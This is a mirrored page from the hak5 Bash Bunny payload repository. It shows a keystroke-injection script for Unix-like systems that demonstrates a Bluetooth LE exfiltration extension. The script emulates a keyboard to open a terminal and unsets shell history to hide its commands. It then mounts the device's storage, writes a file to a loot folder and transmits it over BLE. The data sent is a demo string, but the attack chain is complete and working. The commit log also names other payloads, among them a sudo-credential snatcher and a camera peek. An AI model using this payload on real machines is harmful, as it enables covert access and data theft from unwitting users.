mirror of
https://github.com/hak5/bashbunny-payloads.git
synced 2026-05-04 15:15:39 +01:00
drapl0n
b59823da1e
* Uploaded BunnyLogger * uploading payload intel * Create README.md * Update README.md * uploaded LinuxPreter * uploaded FileRipper Faster executing version * Update README.md * fixing typo * uploaded sudoSnatch * Update README.md * deleting sudoSnatch * uploading payload * Delete payload.sh * Delete shell * Delete systemBus * Delete camPeek directory * Update payload.sh * Update payload.sh * Delete payloads/library/execution/FileRipper directory * Update payload.sh * Update payload.sh * Update payload.sh * Update payload.sh * uploading BLE_EXFIL extension BLE_EXFIL extension, exfiltrates data via BLE * BLE_EXFIL demo
48 lines
915 B
Plaintext
48 lines
915 B
Plaintext
# Description: Demonstration of BLE_EXFIL extension.
|
|
# AUTHOR: drapl0n
|
|
# Version: 1.0
|
|
# Category: Exfiltration
|
|
# Target: Unix-like operating systems.
|
|
# Attackmodes: HID, Storage
|
|
|
|
LED SETUP
|
|
ATTACKMODE STORAGE HID
|
|
GET SWITCH_POSITION
|
|
LED ATTACK
|
|
Q DELAY 1000
|
|
Q CTRL-ALT t
|
|
Q DELAY 1000
|
|
|
|
# [Prevent storing history]
|
|
Q STRING unset HISTFILE
|
|
Q ENTER
|
|
Q DELAY 200
|
|
|
|
# [Fetching BashBunny's block device]
|
|
Q STRING lol='$(lsblk | grep 1.8G)'
|
|
Q ENTER
|
|
Q DELAY 100
|
|
Q STRING disk='$(echo $lol | awk '\'{print\ '$1'}\'\)''
|
|
Q ENTER
|
|
Q DELAY 200
|
|
|
|
# [Mounting BashBunny]
|
|
Q STRING udisksctl mount -b /dev/'$disk' /tmp/tmppp
|
|
Q ENTER
|
|
Q DELAY 2000
|
|
Q STRING mntt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)''
|
|
Q ENTER
|
|
Q DELAY 500
|
|
|
|
# [Advertising Data]
|
|
Q STRING echo BashBunnyRocks \> '$mntt'/loot/ble_exfil.txt
|
|
Q ENTER
|
|
BLE_EXFIL
|
|
Q DELAY 200
|
|
Q STRING udisksctl unmount -b /dev/'$disk'
|
|
Q ENTER
|
|
Q DELAY 500
|
|
Q STRING exit
|
|
Q ENTER
|
|
LED FINISH
|